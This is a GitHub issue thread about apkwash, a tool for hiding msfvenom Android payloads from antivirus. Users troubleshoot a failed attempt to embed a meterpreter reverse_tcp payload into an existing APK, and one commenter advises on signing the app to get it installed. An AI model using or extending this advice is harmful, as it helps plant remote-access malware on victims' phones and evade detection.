jbreed / apkwash

Android APK Antivirus evasion for msfvenom generated payloads.
GNU General Public License v3.0
184 stars 65 forks source link

Embed payload not work #10

Open gnu-like opened 4 years ago

gnu-like commented 4 years ago

Unfortunately embed payload in original has problems especially singing!

jbreed commented 4 years ago

I'll have to revisit this script. What is the exact command you are using and/or do you have the output of it failing?

gnu-like commented 4 years ago

Using command: apkwash -x my.apk -p android/meterpreter/reverse_tcp LHOST=my_ip LPORT=my_port Output failing: Error: INSTALL_PARSE_FAILED_NO_CERTIFICATES

tokit3mx commented 8 months ago

Using command: apkwash -x my.apk -p android/meterpreter/reverse_tcp LHOST=my_ip LPORT=my_port Output failing: Error: INSTALL_PARSE_FAILED_NO_CERTIFICATES

If you don't even know what this error is, why are You even here? That means the the apk that you are trying to install does not contain any certificate, which is not allowed on Android. Technically from what I know this script does try to sign the app, but in case it didn't you just need to manually sign an app, for example with a debug key you can generate. Tho there is never a guarantee you will pass Play Protect even after that.